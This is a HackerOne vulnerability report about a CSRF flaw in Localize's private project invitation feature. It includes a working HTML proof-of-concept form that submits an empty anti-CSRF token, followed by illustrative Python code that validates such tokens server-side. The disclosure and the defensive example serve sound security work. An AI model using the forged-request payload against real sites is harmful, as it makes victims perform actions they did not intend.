ID H1:8226
Type hackerone
Title Localize: Private Project Access Request Invitation Sent Via CSRF
Reporter ajaysinghnegi
Published 2014-04-20T18:02:43
Modified 2014-04-21T02:49:03
Href https://hackerone.com/reports/8226
Description
Hi Team,
I have found a CSRF vulnerability using which the attacker can force the victim to send a Private Project Access Invitation Request via CSRF; the anti-CSRF token is not getting validated on the server side.
Private Project Access Request Invitation Sent Via CSRF Code:
<html>
  <body>
    <form action="http://www.localize.io/" method="POST">
      <!-- Empty token: the report states the server did not validate it -->
      <input type="hidden" name="CSRFToken" value="" />
      <input type="hidden" name="requestInvitation[repositoryID]" value="9p" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
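As an added illustration of the missing server-side check (example code written for this page, not Localize's code or the reporter's), the handler below binds the anti-CSRF token to the session, rejects a missing or empty CSRFToken such as the one in the PoC form, and compares tokens in constant time. Session storage and the form bodies are constructed inline; the function and field names other than CSRFToken and requestInvitation[repositoryID] are assumptions.

```python
import hmac
import secrets


def issue_csrf_token(session: dict) -> str:
    """Generate a per-session anti-CSRF token and keep it server-side."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session: dict, form: dict) -> bool:
    """Accept only a submitted token that matches the session's token.

    A missing or empty CSRFToken (as in the report's PoC, value="") fails
    closed; matching uses a constant-time comparison.
    """
    expected = session.get("csrf_token")
    submitted = form.get("CSRFToken")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_request_invitation(session: dict, form: dict) -> tuple:
    """Handle the requestInvitation POST with the CSRF check enforced."""
    if not csrf_token_valid(session, form):
        return 403, "invalid or missing CSRF token"
    repo_id = form.get("requestInvitation[repositoryID]", "")
    if not repo_id:
        return 400, "missing repositoryID"
    return 200, f"invitation requested for repository {repo_id}"


if __name__ == "__main__":
    session = {}  # constructed stand-in for server-side session state
    token = issue_csrf_token(session)
    # Cross-site POST shaped like the PoC form: empty CSRFToken -> rejected
    print(handle_request_invitation(
        session, {"CSRFToken": "", "requestInvitation[repositoryID]": "9p"}))
    # Same-site POST carrying the session's own token -> accepted
    print(handle_request_invitation(
        session, {"CSRFToken": token, "requestInvitation[repositoryID]": "9p"}))
```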